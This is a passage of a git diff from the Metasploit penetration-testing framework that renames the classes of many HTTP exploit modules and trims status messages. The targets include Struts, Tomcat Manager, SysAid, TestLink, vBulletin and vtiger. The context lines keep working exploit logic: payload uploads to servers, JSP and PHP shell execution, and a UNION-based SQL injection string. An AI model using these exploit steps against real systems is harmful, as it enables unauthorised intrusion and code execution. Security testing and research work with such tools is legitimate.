+5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 79a444c8dc..4893376653 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's going to manipulate the Class Loader include Msf::Exploit::FileDropper @@ -147,13 +147,13 @@ class Metasploit3 < Msf::Exploit::Remote def check_log_file(hint) uri = normalize_uri("/", @jsp_file) - print_status("#{peer} - Waiting for the server to flush the logfile") + print_status("Waiting for the server to flush the logfile") 10.times do |x| select(nil, nil, nil, 2) # Now make a request to trigger payload - vprint_status("#{peer} - Countdown #{10-x}...") + vprint_status("Countdown #{10-x}...") res = dump_line(uri) # Failure. The request timed out or the server went away. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/ - print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}") + print_good("Log file flushed at http://#{peer}/#{@jsp_file}") return true end end @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = payload.encoded print_status("JSP payload available on #{unc}...") - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'version' => '1.1', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/') jsp_shell << "/#{self.file_name}" - print_status("#{peer} - Accessing JSP shell at #{jsp_shell}...") + print_status("Accessing JSP shell at #{jsp_shell}...") send_request_cgi({ 'uri' => normalize_uri(jsp_shell), 'version' => '1.1', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Modify the Class Loader - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") properties = { :directory => 'webapps/ROOT', :prefix => prefix_jsp, @@ -274,11 +274,11 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@jsp_file) # Prepare the JSP - print_status("#{peer} - Generating JSP...") + print_status("Generating JSP...") jsp = create_jsp # Dump the JSP to the log file - print_status("#{peer} - Dumping JSP into the logfile...") + print_status("Dumping JSP into the logfile...") random_request = rand_text_alphanumeric(3 + rand(3)) uri = normalize_uri('/', random_request) diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 83a47cb405..108963ebf6 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index bf8bbb31b9..8fc53b6155 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, 'Unsupported target platform!') end - print_status("#{peer} - Uploading exploit to #{payload_exe}") + print_status("Uploading exploit to #{payload_exe}") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote append = true end java_upload_part(pl_exe, payload_exe, append) - print_status("#{peer} - Executing payload") + print_status("Executing payload") execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(payload_exe) diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index af4acfdf6a..dc6ddf026c 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_dev_mode.rb b/modules/exploits/multi/http/struts_dev_mode.rb index 856973c841..51101ea197 100644 --- a/modules/exploits/multi/http/struts_dev_mode.rb +++ b/modules/exploits/multi/http/struts_dev_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 555d03f990..14f272491c 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_eval.rb b/modules/exploits/multi/http/stunshell_eval.rb index 6612a08732..e6df8bb6b2 100644 --- a/modules/exploits/multi/http/stunshell_eval.rb +++ b/modules/exploits/multi/http/stunshell_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_exec.rb b/modules/exploits/multi/http/stunshell_exec.rb index 33e003d6bd..452faf5481 100644 --- a/modules/exploits/multi/http/stunshell_exec.rb +++ b/modules/exploits/multi/http/stunshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 4ef79cf5fa..9601ddd0bd 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 4a8a64da2c..50eed593b7 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_exploit - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/ if is_exploit - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end return $1 @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote return target end - print_status("#{peer} - Determining target") + print_status("Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} url = upload_payload(os_finder_payload, false) @@ -233,13 +233,13 @@ class Metasploit3 < Msf::Exploit::Remote unless @cookie fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.") end - print_status("#{peer} - Authentication was successful with the provided credentials.") + print_status("Authentication was successful with the provided credentials.") @my_target = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") end - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup('root/' + jsp_path) end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_path), 'method' => 'GET', diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index 2eb0ab33e0..1fe9f34dd9 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def send_payload(war_payload, tomcat_path, app_base) # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), 'method' => 'POST', @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting for deployment") + print_status("Upload appears to have been successful, waiting for deployment") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directory") + print_status("Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success! Triggered the payload, should have a shell incoming return if res.code == 200 end - print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...") + print_error("Failed to launch payload. Trying one last time with a different path...") # OK this might be a Linux server, it's a different traversal path. # Let's try again... @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index b64dc1083e..1ef14c565f 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project <a href="http:\/\/testlink\.sourceforge\.net\/docs\/testLink\.php">Home<\/a><br \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -158,29 +158,29 @@ class Metasploit3 < Msf::Exploit::Remote # register an account user = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Registering user (#{user})") + print_status("Registering user (#{user})") res = register(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Registered successfully") + print_status("Registered successfully") else - print_error("#{peer} - Registration failed") + print_error("Registration failed") return end # login - print_status("#{peer} - Authenticating user (#{user})") + print_status("Authenticating user (#{user})") res = login(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end # set id and table name id = rand(1000)+1 table = 'nodes_hierarchy' - print_status("#{peer} - Setting id (#{id}) and table name (#{table})") + print_status("Setting id (#{id}) and table name (#{table})") begin res = send_request_cgi({ 'method' => 'GET', @@ -188,35 +188,35 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 - print_status("#{peer} - Setting id and table name successfully") + print_status("Setting id and table name successfully") else - print_error("#{peer} - Setting id and table name failed") + print_error("Setting id and table name failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, fname, php) if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from directory index - print_status("#{peer} - Retrieving real file name from directory index.") + print_status("Retrieving real file name from directory index.") begin res = send_request_cgi({ 'method' => 'GET', @@ -224,19 +224,19 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from directory index.") + print_error("Could not retrieve file name from directory index.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from the database if @token.nil? - print_status("#{peer} - Retrieving real file name from the database.") + print_status("Retrieving real file name from the database.") sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" begin res = send_request_cgi({ @@ -246,26 +246,26 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from the database.") + print_error("Could not retrieve file name from the database.") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{@token}.php)") + print_status("Executing payload (#{@token}.php)") begin send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 75c6beda9c..8bcde06e80 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index b8b674d5c3..802cb21512 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote return CheckCode::Unknown if res.nil? if res.code.between?(400, 499) - vprint_error("#{peer} - Server rejected the credentials") + vprint_error("Server rejected the credentials") return CheckCode::Unknown end @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote arch = detect_arch(res.body) return CheckCode::Unknown unless plat and arch - vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") + vprint_status("Tomcat Manager found running on #{plat} platform and #{arch} architecture") report_tomcat_credential @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Find the session ID and the CSRF token # - print_status("#{peer} - Retrieving session ID and CSRF token...") + print_status("Retrieving session ID and CSRF token...") unless access_manager? fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload Payload # - print_status("#{peer} - Uploading and deploying #{@app_base}...") + print_status("Uploading and deploying #{@app_base}...") if upload_payload report_tomcat_credential else @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Execute Payload # - print_status("#{peer} - Executing #{@app_base}...") + print_status("Executing #{@app_base}...") unless execute_payload fail_with(Failure::Unknown, "Failed to execute the payload") end @@ -171,9 +171,9 @@ class Metasploit3 < Msf::Exploit::Remote # # Delete the deployed payload # - print_status("#{peer} - Undeploying #{@app_base} ...") + print_status("Undeploying #{@app_base} ...") unless undeploy_app - print_warning("#{peer} - Failed to undeploy #{@app_base}...") + print_warning("Failed to undeploy #{@app_base}...") end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => path) unless res and res.code == 200 - vprint_error("#{peer} - Failed: Error requesting #{path}") + vprint_error("Failed: Error requesting #{path}") return nil end @@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote def find_csrf(res = nil) return "" if res.blank? - vprint_status("#{peer} - Finding CSRF token...") + vprint_status("Finding CSRF token...") body = res.body @@ -343,17 +343,17 @@ class Metasploit3 < Msf::Exploit::Remote def upload_payload war = war_payload upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") - vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") + vprint_status("Uploading #{war.length} bytes as #{@app_base}.war ...") res = send_war_payload(upload_path, war) unless res - vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") + vprint_error("Upload failed on #{upload_path} [No Response]") return false end if res.code < 200 or res.code >= 300 vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 - vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]") + vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") return false end @@ -363,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_payload jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") - vprint_status("#{peer} - Executing #{jsp_path}...") + vprint_status("Executing #{jsp_path}...") res = send_request_cgi({ 'uri' => jsp_path, @@ -375,12 +375,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_execute_response(res) unless res - vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") + vprint_error("Execution failed on #{@app_base} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") + vprint_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]") return false end @@ -392,12 +392,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_undeploy(undeploy_url) unless res - vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") + vprint_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") + vprint_warning("Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") return false end diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 7c972720cb..a5caeffc82 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 3e4a56ed4a..e50a1ce5aa 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb +++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading PHP to Up.Time server") + print_status("Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote "script" => php_payload }) - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' diff --git a/modules/exploits/multi/http/uptime_file_upload_2.rb b/modules/exploits/multi/http/uptime_file_upload_2.rb index 71fe60d2a0..ebcee62cd3 100644 --- a/modules/exploits/multi/http/uptime_file_upload_2.rb +++ b/modules/exploits/multi/http/uptime_file_upload_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE diff --git a/modules/exploits/multi/http/v0pcr3w_exec.rb b/modules/exploits/multi/http/v0pcr3w_exec.rb index 1c94eb7118..c8c5958069 100644 --- a/modules/exploits/multi/http/v0pcr3w_exec.rb +++ b/modules/exploits/multi/http/v0pcr3w_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index be7f303cd8..081b7421fc 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 1238434ece..a9183cdb48 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to inferprint the instance...") + print_status("Trying to inferprint the instance...") @my_target = target check_code = check @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index 9c4c7972c0..7120fa3926 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -75,15 +75,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/vtiger_install_rce.rb b/modules/exploits/multi/http/vtiger_install_rce.rb index 3e76c223bf..46076f32c4 100644 --- a/modules/exploits/multi/http/vtiger_install_rce.rb +++ b/modules/exploits/multi/http/vtiger_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # Application database configuration is overwritten Rank = ManualRanking diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 92472d92bd..1ab8da5768 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index d8c06a41c1..89f2684aed 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include REXML @@ -89,15 +89,15 @@ class Metasploit3 < Msf::Exploit::Remote soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ - print_good("#{peer} - Upload successfully uploaded") + print_good("Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0) end diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 41e4dfa4da..4ad2b196c1 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote "form-data; name=\"file\"; filename=\"#{fname}\"" #Content Disposition ) - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 